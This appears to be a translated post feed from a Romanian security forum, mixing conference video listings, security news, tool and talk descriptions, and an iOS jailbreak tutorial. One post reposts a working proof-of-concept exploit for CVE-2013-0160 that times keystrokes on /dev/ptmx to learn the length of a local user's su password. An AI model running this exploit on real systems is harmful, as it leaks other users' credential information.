[TR][TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD][TD=align: right]03-Feb-2013 01:08[/TD][TD=align: right]282M[/TD][/TR]
[TR][TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD][TD=align: right]02-Feb-2013 19:25[/TD][TD=align: right]41M[/TD][/TR]
[TR][TD]Teaching_the_X_server_new_tricks.mp4[/TD][TD=align: right]04-Feb-2013 09:38[/TD][TD=align: right]102M[/TD][/TR]
[TR][TD]The_IPocalypse_20_months_later.mp4[/TD][TD=align: right]02-Feb-2013 19:25[/TD][TD=align: right]177K[/TD][/TR]
[TR][TD]The_Perl_Renaissance.mp4[/TD][TD=align: right]02-Feb-2013 20:17[/TD][TD=align: right]59M[/TD][/TR]
[TR][TD]The_Raspberry_Pi_and_Linux.mp4[/TD][TD=align: right]02-Feb-2013 21:45[/TD][TD=align: right]159M[/TD][/TR]
[TR][TD]The_future_of_nonvolatile_memory.mp4[/TD][TD=align: right]02-Feb-2013 19:24[/TD][TD=align: right]49M[/TD][/TR]
[TR][TD]The_real_story_behind_Wayland_and_X.mp4[/TD][TD=align: right]03-Feb-2013 15:51[/TD][TD=align: right]68M[/TD][/TR]
[TR][TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD][TD=align: right]02-Feb-2013 21:21[/TD][TD=align: right]47M[/TD][/TR]
[TR][TD]Think_Create_Critique_Design.mp4[/TD][TD=align: right]02-Feb-2013 23:18[/TD][TD=align: right]78M[/TD][/TR]
[TR][TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD][TD=align: right]02-Feb-2013 23:18[/TD][TD=align: right]121M[/TD][/TR]
[TR][TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD][TD=align: right]03-Feb-2013 18:40[/TD][TD=align: right]118M[/TD][/TR]
[TR][TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD][TD=align: right]03-Feb-2013 00:37[/TD][TD=align: right]96M[/TD][/TR]
[TR][TD]Two_years_of_LibreOffice.mp4[/TD][TD=align: right]03-Feb-2013 00:48[/TD][TD=align: right]109M[/TD][/TR]
[TR][TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD][TD=align: right]02-Feb-2013 21:48[/TD][TD=align: right]95M[/TD][/TR]
[TR][TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD][TD=align: right]04-Feb-2013 10:23[/TD][TD=align: right]101M[/TD][/TR]
[TR][TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD][TD=align: right]02-Feb-2013 21:49[/TD][TD=align: right]1.8M[/TD][/TR]
[TR][TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD][TD=align: right]02-Feb-2013 23:03[/TD][TD=align: right]121M[/TD][/TR]
[TR][TD]Why_kernel_space_sucks.mp4[/TD][TD=align: right]03-Feb-2013 15:51[/TD][TD=align: right]63M[/TD][/TR]
[TR][TD]Wiggle_while_you_work.mp4[/TD][TD=align: right]03-Feb-2013 13:48[/TD][TD=align: right]92M[/TD][/TR]
[TR][TD]gitannex.mp4[/TD][TD=align: right]03-Feb-2013 18:29[/TD][TD=align: right]61M[/TD][/TR]
[TR][TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD][TD=align: right]02-Feb-2013 18:58[/TD][TD=align: right]60M[/TD][/TR]
[TR][TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD][TD=align: right]03-Feb-2013 14:37[/TD][TD=align: right]94M[/TD][/TR]
[/TABLE]

Source: Index of /linux.conf.au/2013/mp4
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Stiri securitate
Chinese experts slam U.S. hacking accusations - People's Daily Online
US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register
https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed
'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News
-
Yes, you're right, it's work for little money. But let's not forget that open source doesn't mean a lack of funding. The big companies that effectively make money off open-source projects pay people to work on these projects. One example is Intel, and an example project is the Linux kernel itself. If their processors didn't work on Linux it would be bad, so they invest in kernel programmers. It's much the same with other projects; in some cases there are also donations or sponsorships, as with OpenSSL, which is waiting for sponsorships of 50K dollars. But if we pay attention, we realize that it offers FIPS support, a certification that costs about 50K dollars. What can be useful for these young people, besides the fact that they learn many new and useful things, is that they end up working at big companies like Google, which will treat them well.
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Stiri securitate
Ooh, shit just got serious... We have the two camps:
1. The Chinese, with that saying: How do the Chinese crack a password? Each one tries one. In other words, there are a lot of them -> potential
2. The Americans, who are guys with money and can pay some Indians 2 dollars a year to do their dirty work
Who are you betting on?
-
From Jurnalul, the same news:
"The 334 participating students from 36 countries had to complete 1925 different assignments and tasks proposed by the open-source organizations"
"The 20 completed 576 assignments, Google Open Source announces"
Apparently he worked on BRL-CAD | Open Source Solid Modeling. I'm curious whether these initiatives are OK, or whether the companies are just getting some kids to do their work. It seems that other projects there included Fedora, NetBSD, KDE and Haiku. Interesting.
-
Firefox will block any content based on Java, Reader and Silverlight
Nytro replied to Matt's topic in Stiri securitate
HTML 5 is coming, and neither Java nor Flash will be needed anymore.
-
SSL - Bridges between secure and insecure
Nytro replied to unixbreak's topic in Tutoriale in engleza
Yes, nice article
-
[h=1]Stephan T. Lavavej - Core C++, 8 of n[/h]
In part 8, STL digs into the do-while loop, casts, one definition rule (ODR), and his variadic template array sorter. There is a lot of information in this episode, so get comfortable, tune in, and learn.
See part 1: Name Lookup
See part 2: Template Argument Deduction
See part 3: Overload Resolution
See part 4: Virtual Functions
See part 5: Explicit and Partial Specialization
See part 6: New C++11 features added to the Visual C++ 2012 compiler (CTP)
See part 7: Usual Arithmetic Conversions and Template Metaprogramming
Source: Stephan T. Lavavej - Core C++, 8 of n | C9 Lectures: Stephan T. Lavavej - Core C++ | Channel 9
-
Rapid Blind Sql Injection Exploitation With Bbqsql
Description: Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. This talk will be introducing a new tool called BBQSQL that attempts to address these concerns. This talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will cover how features like evented concurrency and character frequency based searching can greatly improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge to begin using BBQSQL to simplify and speed up your application pentests.
Ben Toews is a Security Consultant at Neohapsis where he specializes in application and network pentesting. Previously, Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has been published in HITB Magazine. Ben has a BS in Information Assurance and Security Engineering from DePaul University. Twitter: @mastahyeti
Scott Behrens is currently employed as a Security Consultant at Neohapsis and an Adjunct Professor at DePaul University. Before Neohapsis, Scott Behrens was an Open Systems Architect for a financial consulting firm, as well as a Network Administrator at Argonne National Laboratories. Scott Behrens' expertise lies in software security assessment, network penetration testing, social engineering, security architecture, and security research. Scott is also the co-developer of NeoPI, a framework to aid in the detection of obfuscated malware. Scott has also presented at Chicago B-sides and has published numerous articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University. Twitter: @HelloArbit
Source: Rapid Blind Sql Injection Exploitation With Bbqsql
-
[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h]
#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local
# user who runs "su -". Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" session before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result() {
  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {
  int fd;
  char buf[1024];

  signal(SIGINT, display_result);

  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);

  while(read(fd, buf, 1024))
    count++;

  return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo " [*] Wait for someone to run \"su -\""

while true; do
  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})
  case ${x% *} in
    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp};
       ${exe} &
       (( run = 1 ))
       ;;
    2) [ ! -z "$!" ] && kill -2 $!;
       break
       ;;
  esac
done

rm -f ${exe}{,.c} ${tmp}

Source: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
-
Capture a request and show me exactly how your browser sends it. That's so I don't have to sit with tcpdump myself, because I'd die.
-
http://i49.tinypic.com/2rz75n6.png
-
You must be joking... They aren't inserted with [ IMG ] there, they're just links. Imgur: Imageshack: Don't they show up for you?
-
Well, damn, now there are a lot from China, Indonesia, Brazil and other countries I've never heard of.
How many visitors we have: There are currently 1517 users online. 81 members and 1436 guests
Is that all the girls can do?
netstat -ntp | sort -u | grep FIN_WAIT1 | grep -E -o '443.*([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' | grep -E -o '([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' | sort -u
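The one-liner in the post above prints each remote address once; when triaging a flood, the per-address socket count is what separates an ordinary client from a source worth rate-limiting. The following is an added example, not part of the original post, that ranks peers by socket count over constructed `netstat -nt` output; the function names, the sample addresses and the optional threshold argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: rank remote peers by the number of sockets they hold in a
# given TCP state on a given local port, from `netstat -nt` style output.

# Constructed sample of `netstat -nt` output (documentation-range addresses).
sample_netstat() {
cat <<'EOF'
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      1 192.0.2.10:443          198.51.100.7:51812      FIN_WAIT1
tcp        0      1 192.0.2.10:443          198.51.100.7:51813      FIN_WAIT1
tcp        0      1 192.0.2.10:443          198.51.100.7:51814      FIN_WAIT1
tcp        0      0 192.0.2.10:443          203.0.113.25:40022      ESTABLISHED
tcp        0      1 192.0.2.10:443          203.0.113.25:40023      FIN_WAIT1
tcp        0      1 192.0.2.10:80           203.0.113.99:40100      FIN_WAIT1
tcp6       0      1 ::ffff:192.0.2.10:443   ::ffff:198.51.100.7:6001 FIN_WAIT1
tcp6       0      1 2001:db8::10:443        2001:db8::beef:44321    FIN_WAIT1
EOF
}

# peers_in_state PORT STATE [MIN]
# Reads netstat output on stdin and prints "count address" for every remote
# address holding at least MIN (default 1) sockets in STATE on local PORT,
# busiest first. Matching is done on columns, so a remote port of 443 or an
# address containing "443" is not mistaken for the local service port.
peers_in_state() {
    awk -v port="$1" -v state="$2" -v min="${3:-1}" '
        # awk passes scalars by value, so these helpers do not alter $4/$5.
        function strip_port(a) { sub(/:[0-9]+$/, "", a); return a }
        function local_port(a) { sub(/^.*:/, "", a); return a }
        $1 ~ /^tcp/ && $6 == state && local_port($4) == port {
            peer = strip_port($5)
            sub(/^::ffff:/, "", peer)   # fold IPv4-mapped IPv6 into IPv4
            n[peer]++
        }
        END { for (p in n) if (n[p] >= min) print n[p], p }
    ' | LC_ALL=C sort -k1,1nr -k2,2
}

# Run against the constructed sample; on a live host the input would be
# `netstat -nt | peers_in_state 443 FIN_WAIT1 20`.
sample_netstat | peers_in_state 443 FIN_WAIT1
```
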
-
Portable UPnP SDK unique_service_name() Remote Code Execution
Nytro replied to Praetorian503's topic in Exploituri
Details: https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf
-
It's possible that some servers check HTTP_REFERER and, if they see that the request is made from another server, return an error code. Post some examples.
-
Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers
By: Larry Larsen, Andrew Richards, Chad Beeder
In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to diagnose Semaphores, Mutexes and (Waitable) Timers in a user mode application. For timers, we delve deep into the kernel to gather more information about them.
We use these commands:
!handle
!handle <handle> <mask>
!object <name>
!object <addr>
!timer
!timer <addr>
ub @rip
dt nt!_KTHREAD <addr>
Make sure you watch Defrag Tools Episode #1 and Defrag Tools Episode #23 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbol and source code resolution.
Resources:
Synchronization Functions
Semaphore Objects
Mutex Objects
Waitable Timer Objects
Sysinternals LiveKD
Sysinternals WinObj
Windows 7 and Windows Server 2008 R2 Kernel Changes (Timer Coalescing)
Timeline:
[02:47] - Demo Apps [SkyDrive]
[03:08] - Semaphores
[09:32] - Mutexes
[15:32] - Waitable Timers
[15:58] - Clock Resolution
[17:05] - Timer Coalescing
[19:45] - Timer demo application
[25:05] - LiveKD makes a kernel dump
[26:37] - Object Manager - !object
[29:40] - DPC Timers - !timer
[35:22] - !timer <addr>
[35:52] - Waiting Threads - !thread <addr> 17
[37:08] - Wait Start TickCount
[38:55] - Kernel Wait Routines
[41:12] - Dump Type of Kernel Thread - dt nt!_KTHREAD <addr>
[42:00] - Running, Ready and Waiting states
[44:54] - Wakable Timers
[47:22] - powercfg.exe /waketimers
[49:18] - 'Century' DPC Timer Routine
[50:43] - Post in the forums and email us at defragtools@microsoft.com!
Source: Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers | Defrag Tools | Channel 9
-
[h=1]How to: iOS 6.x Untethered Jailbreak on Linux[/h]
The following tutorial will teach Linux users how to jailbreak their Apple iPhone 3GS, iPhone 4/4S, iPad 2/3/4 and iPod Touch 4G/5G devices that run iOS 6 or later.
In this tutorial we will use the recently released evasi0n jailbreak tool, which runs on Linux, Mac OS X and Windows platforms. In no more than five minutes, your iDevice will be jailbroken, but only if you read the following information and warnings carefully.
Supported devices:
· iPhone 3GS;
· iPhone 4 GSM;
· iPhone 4S;
· iPod Touch 4G;
· iPod Touch 5G;
· iPad 2 Wi-Fi;
· iPad 2 3G;
· iPad 2 2012;
· iPad 3 Wi-Fi;
· iPad 3 Wi-Fi + 4G;
· iPad 4 Wi-Fi;
· iPad 4 Wi-Fi + 4G;
· iPad Mini Wi-Fi;
· iPad Mini 3G.
Requirements:
· evasi0n 1.0;
· A device from the above list with iOS 6.0, 6.0.1 or 6.1;
· A Linux distribution with a recent version of libimobiledevice library, kernel >= 2.6.24, and libgtk+-2.0 >= 2.24.13.
WARNING: Make sure that your iPad, iPhone or iPod device is supported (see the supported devices list at the beginning of the article) and that it was already updated to iOS 6.x. Those of you who require a network unlock DO NOT PROCEED with the tutorial!
ATTENTION: ALWAYS make a backup of your device(s) before the jailbreak procedure! Make sure the battery is charged over 50% and that the device is connected to the computer via the USB cable! Not meeting these requirements will result in a failure!
Step 1 – Download and execute evasi0n
You can grab a copy of the evasi0n jailbreak tool right now from here. Download it on your desktop and extract the file from the archive. Both 32-bit and 64-bit architectures are supported.
Connect your iDevice and double-click the executable for your architecture and you will see the following window...
Your device will be detected, and all you have to do now is to click the "Jailbreak" button.
DO NOT PUSH ANY BUTTONS! DO NOT TOUCH THE COMPUTER! DO NOT REMOVE ANY CABLE!
When the progress bar on the evasi0n tool is complete, and the evasi0n icon appears on your device, launch it to complete the jailbreak process!
When evasi0n has finished the jailbreak process, reboot the device and you'll see the Cydia icon on the home screen of your iDevice, which means that the jailbreak process is over and you can restore the backup.
Watch the video below for more details!
Source: How to: iOS 6.x Untethered Jailbreak on Linux - Softpedia
-
[h=1]JavaScript becoming default language for GNOME apps[/h]
At the GNOME Developer Experience Hackfest in Brussels, the GNOME developer community has tackled the problem of specifying a canonical development language for writing applications for the GNOME desktop. According to a blog post by Collabora engineer and GNOME developer Travis Reitter, members of the GNOME team are often asked what tools should be used when writing an application for the desktop environment and, up until now, there has been no definitive answer. The team has now apparently decided to standardise on JavaScript for user-facing applications while still recommending C as the language to write system libraries in.
The Hackfest took place in the days immediately preceding the FOSDEM 2013 conference in Brussels and was well attended by representatives from many different open source companies. There was a "broad consensus" to adopt a single language for GNOME application development, says Reitter. He points out that a canonical language enables the developers to more easily prepare documentation for, and share knowledge with, newcomers to the development community. It also helps more easily integrate applications written for the desktop with the desktop's infrastructure.
After a long discussion weighing the arguments for and against several languages, the developers apparently decided on JavaScript, as it is already well supported in GNOME 3 by virtue of the fact that the desktop's GNOME Shell interface uses it to implement its user interface. Reitter also points to ongoing work to make JavaScript better supported as a first class desktop development language. GNOME's JavaScript plans are informed in part by how the language is used for similar purposes in Windows 8, Firefox OS and other systems, and that, the team hopes, will make it easier for developers who are new to GNOME to work with it.
Despite the fact that JavaScript will be the recommended way to write GNOME applications, the developers are nonetheless stressing that other languages will still be supported. "It's critical that everyone understands this decision as a plan to elevate the language, bindings, tools, and documentation to a level of quality we have not yet achieved. It is not a decision to abandon any other language bindings", says Reitter. (fab)
Source: JavaScript becoming default language for GNOME apps - The H Open: News and Features
-
ApiHooks 6
ApiHooks 6 is a set of libraries and tools for advanced process modification and noninvasive debugging on Microsoft® Windows® NT 3.51, 4.0, 2000, XP, 2003, Vista, 2008, 7 x86 and x64. AH6 is not compatible with AH5. It can hook even autochk at boot time or a process before its full initialization (= before the DllMains of statically linked modules are executed for the first time). Works under any account and doesn't modify files. There's still no need for services or kernel drivers.
ApiHooks 6 is free.
Current version : 6.8
Previous version : 6.6
Previous version : 6.51
Previous version : 6.5
Previous version : 6.4
Previous version : 6.3
Source: ApiHooks 6 - ApiHooks.com